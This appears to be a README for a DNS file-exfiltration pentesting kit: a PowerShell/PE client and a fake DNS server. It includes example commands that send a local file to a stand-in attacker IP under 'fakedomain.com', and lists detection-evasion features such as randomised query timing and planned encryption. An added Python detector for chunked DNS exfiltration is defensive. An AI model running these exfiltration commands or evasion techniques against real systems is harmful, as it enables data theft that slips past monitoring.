DNSexfiltools

Client/Server tools for DNS exfiltration

Primary language: PowerShell

DNS Exfil Tools

Simple penetration testing tools to execute file exfiltration through DNS and avoid common detection methods.

Module status legend:
✔️ Available
🔵 Under development
⚪ To be developed


Client Exfiltration

Deploy these tools on the target machine to exfiltrate files through DNS requests. I'm still developing the client side for more than one programming language, to provide more compatibility with the system you are testing.

Language            Available   Compression   Encryption
python3             ✔️          🔵            🔵
powershell          ✔️          🔵            🔵
python2             🔵          ⚪            ⚪
x86 Win binaries    ✔️          ⚪            ⚪
x64 Win binaries    ✔️          ⚪            ⚪

Powershell Module

Use the Get-Help cmdlet for usage information; Get-Help -detailed prints a fuller overview.
Example output:

NAME
    C:\Users\User\Desktop\dnsexfil.ps1

SYNOPSIS
    Post-exploitation tool to execute DNS exfiltration to your pentesting machine

SYNTAX
    C:\Users\User\Desktop\dnsexfil.ps1 [-Server] <String> [-Domain] <String> [-File] <String> [[-Timeout] <Single>]
    [[-Length] <Int32>] [-Hash] [<CommonParameters>]


DESCRIPTION
    Post-exploitation tool to execute DNS exfiltration to your pentesting machine
    At leats three parameters are needed:
    - Specify DNS resolver as Server parameter
    - Specify filename
    - Specify the fake or legit domain you want to query
    The fakeDNS-server must be listening on your machine

PARAMETERS
    -Server <String>
        (Required) IP address of the listening DNS resolver

    -Domain <String>
        (Required) Fake or legit domain for DNS queries. Your fakeDNS-server will answer to both

    -File <String>
        (Required) Path to the file to exfiltrate through DNS queries

    -Timeout <Single>
        (Optional) Set a timeout between queries to slow down or speed up exfiltration. Default value is 2s

    -Length <Int32>
        (Optional) Set the third domain length. Default value is 16

    -Hash [<SwitchParameter>]
        (Optional) Include hash calculation in exfiltration for integrity purposes

    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer, PipelineVariable, and OutVariable. For more information, see
        about_CommonParameters (https:/go.microsoft.com/fwlink/?LinkID=113216).

    -------------------------- EXAMPLE 1 --------------------------
    PS C:\>.\dnsexfil.ps1 -Server 10.10.80.129 -d fakedomain.com -File C:\Users\Name\file.txt

    Use 10.10.80.129 as the fakeDNS-server, and send the file C:\Users\Name\file.txt asking for resolution of [***].fakedomain.com:

    -------------------------- EXAMPLE 2 --------------------------
    PS C:\>.\dnsexfil.ps1 -Server 10.10.80.129 -d fakedomain.com -File C:\Users\Name\file.txt -Length 32 -Timeout 10 -Hash

    DNS queries will be like [32-long-chunk].fakedomain.com and will be going out every 10 seconds

Windows Binaries

Windows binaries are the PE versions of the PowerShell script above. I used the awesome PS2EXE utility by interference-security to quickly get the 32 and 64 bit versions.

Usage is the same as for the PowerShell script.

They are both located in rhosts-tools/WinBinaries.



Features and @TODOs

✔️ Set timeout between DNS requests to slow down exfiltration and prevent detection
✔️ Set random timeout between requests to defeat detection based on periodic checks
✔️ Set fake domain or legit domain for DNS queries; the DNS server listening on your machine will respond to both
✔️ Set custom length for the exfiltration third-level domain chunks
✔️ Send filename as first action
✔️ Optional: md5 file hash transmission before file content for integrity checks
🔵 Optional: print server's response as record A resolution to verify queries
🔵 Optional: compress files to exfiltrate to speed up the process
⚪ Optional: file encryption to prevent network sniffers from rebuilding exfiltrated artifacts
⚪ Optional: send multiple files at once
⚪ Optional: send entire directory as compressed file
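The defender's view of the traffic shape described in the PowerShell help and the feature list above: many queries for distinct, data-carrying third-level labels under one registered domain, paced by a fixed or randomised timeout. The following is an added example written for detection and is not part of DNSexfiltools; the log line format, the two-label split of the registered domain, the sample queries and the thresholds are all assumptions, and a real deployment would derive the registered domain from the Public Suffix List and tune the thresholds against its own baseline.

```python
"""Heuristic detection of chunked DNS exfiltration in query logs.

Added example for defenders; not part of the DNSexfiltools repository.
Log format "<epoch_seconds> <client_ip> <qname>" is assumed.
"""
import math
import statistics
from collections import defaultdict

# Constructed sample log: two benign lookups and six 16-char hex chunks
# (the tool's default -Length) under one domain, with jittered spacing.
SAMPLE_LOG = """\
1700000000.0 10.0.0.5 www.example.org
1700000001.3 10.0.0.5 mail.example.org
1700000002.0 10.0.0.7 66696c652e747874.fakedomain.com
1700000004.4 10.0.0.7 48656c6c6f20776f.fakedomain.com
1700000005.9 10.0.0.7 726c642c20746869.fakedomain.com
1700000008.7 10.0.0.7 7320697320612074.fakedomain.com
1700000010.1 10.0.0.7 65737420666c6167.fakedomain.com
1700000013.0 10.0.0.7 2e2e2e0a00000000.fakedomain.com
1700000014.0 10.0.0.5 www.example.org
"""

# Assumed tuning values; calibrate against your own baseline traffic.
THRESHOLDS = {
    "min_queries": 5,        # ignore domains with too few observations
    "min_unique_ratio": 0.8, # share of data labels that never repeat
    "min_label_len": 12,     # hostnames are usually shorter than this
    "min_entropy": 2.5,      # bits/char; hex data approaches 4, words sit lower
}


def shannon_entropy(label):
    """Bits of entropy per character of one DNS label."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Return (registered_domain, data_labels).

    Assumes the registered domain is the last two labels; production code
    should use the Public Suffix List instead.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def parse_log(text):
    """Parse '<epoch> <client> <qname>' lines, skipping malformed ones."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, client, qname = parts
        records.append((float(ts), client, qname))
    return records


def profile_domains(records):
    """Aggregate per registered domain the indicators of chunked data labels."""
    per = defaultdict(lambda: {"times": [], "labels": []})
    for ts, _client, qname in records:
        domain, data_labels = split_qname(qname)
        per[domain]["times"].append(ts)
        per[domain]["labels"].extend(data_labels)

    profiles = {}
    for domain, d in per.items():
        labels = d["labels"]
        times = sorted(d["times"])
        gaps = [b - a for a, b in zip(times, times[1:])]
        lengths = [len(l) for l in labels]
        entropies = [shannon_entropy(l) for l in labels]
        profiles[domain] = {
            "queries": len(times),
            "unique_labels": len(set(labels)),
            "unique_ratio": len(set(labels)) / len(labels) if labels else 0.0,
            "mean_label_len": statistics.fmean(lengths) if lengths else 0.0,
            "mean_entropy": statistics.fmean(entropies) if entropies else 0.0,
            # Timing is reported but not used for the verdict: a randomised
            # timeout defeats periodicity checks, the label shape does not change.
            "mean_gap": statistics.fmean(gaps) if gaps else 0.0,
            "gap_stdev": statistics.pstdev(gaps) if len(gaps) > 1 else 0.0,
        }
    return profiles


def flag_domains(profiles, thresholds=THRESHOLDS):
    """Return the profiles whose leftmost labels look like encoded data."""
    flagged = {}
    for domain, p in profiles.items():
        if p["queries"] < thresholds["min_queries"]:
            continue
        if p["unique_ratio"] < thresholds["min_unique_ratio"]:
            continue
        if (p["mean_label_len"] >= thresholds["min_label_len"]
                or p["mean_entropy"] >= thresholds["min_entropy"]):
            flagged[domain] = p
    return flagged


def detect(log_text, thresholds=THRESHOLDS):
    """Full pipeline: parse, profile, flag."""
    return flag_domains(profile_domains(parse_log(log_text)), thresholds)


if __name__ == "__main__":
    for domain, p in detect(SAMPLE_LOG).items():
        print(f"{domain}: {p['queries']} queries, {p['unique_labels']} unique labels, "
              f"mean label len {p['mean_label_len']:.1f}, "
              f"entropy {p['mean_entropy']:.2f} bits/char, "
              f"gap {p['mean_gap']:.1f}s (stdev {p['gap_stdev']:.1f}s)")
```

Run against the constructed log it reports only fakedomain.com. The verdict deliberately rests on the label shape (count of never-repeating labels, their length and entropy) rather than on query timing, because the tool's random timeout is aimed precisely at detectors that look for regular intervals; the timing statistics are still surfaced so an analyst can see the pacing.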


Fake DNS Server

Developed with Python3, the server module provides a simple fake DNS server that receives the client's queries on your attacking machine and responds with a spoofed IP of your choice (default is google.com's).

Features and @TODOs

✔️ Set custom IP to spoof as record A response
✔️ Set custom domain for further automated file decode
✔️ Set custom UDP port for DNS service (default is 53)
🔵 Get filename from exfiltration first chunk
🔵 Optional: automated file decode/save
🔵 Optional: compressed files receiving capabilities
⚪ Optional: file decryption and save


How it Works

Attacker Side (fake DNS server)

Victim Side (exfiltration tool)